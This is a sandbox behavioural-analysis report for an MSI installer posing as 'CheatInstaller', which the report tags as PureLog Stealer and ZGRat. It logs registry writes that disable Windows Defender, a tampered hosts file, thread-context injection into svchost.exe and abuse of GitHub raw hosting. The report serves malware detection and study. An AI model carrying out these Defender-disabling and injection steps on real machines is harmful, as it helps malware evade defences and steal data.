Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

PureLog Stealer

stealer purelogstealer

PureLog Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation C:\Windows\Installer\MSI32E7.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation C:\Windows\Installer\MSI47BB.tmp N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\syswow64\MsiExec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 6068 set thread context of 8732 N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe
PID 8732 set thread context of 1136 N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe C:\Windows\System32\svchost.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_relation.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_specgan.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_pp.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_fre.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_parametric.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_ita.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_tatum.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_topic.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps4.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_samplernn.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\slow_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps2.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_r9y9.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\event.csv C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\general_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_ibab.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.frm C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\e5794ce.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e5794ce.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI957A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAD90.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI95CD.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB028.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI32F7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAE4E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI955A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI958B.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAE3E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2E90.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI479A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI959C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAD6F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAF3C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB017.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4897.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9C84.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAE0E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI47BB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9D71.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAF1B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI32E7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI95BC.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9D60.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAEBD.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI47AA.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5794d2.msi C:\Windows\system32\msiexec.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}\C:\Users\Admin\AppData\Local\Temp\ferght6fj54f.txt = "*" C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\23 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\PackageName = "YTtSTCHEAT.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\PackageCode = "9860C08E1459A8B42A7F241C2213136F" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\ProductName = "CheatInstaller" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Version = "35651584" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1\MainFeature C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
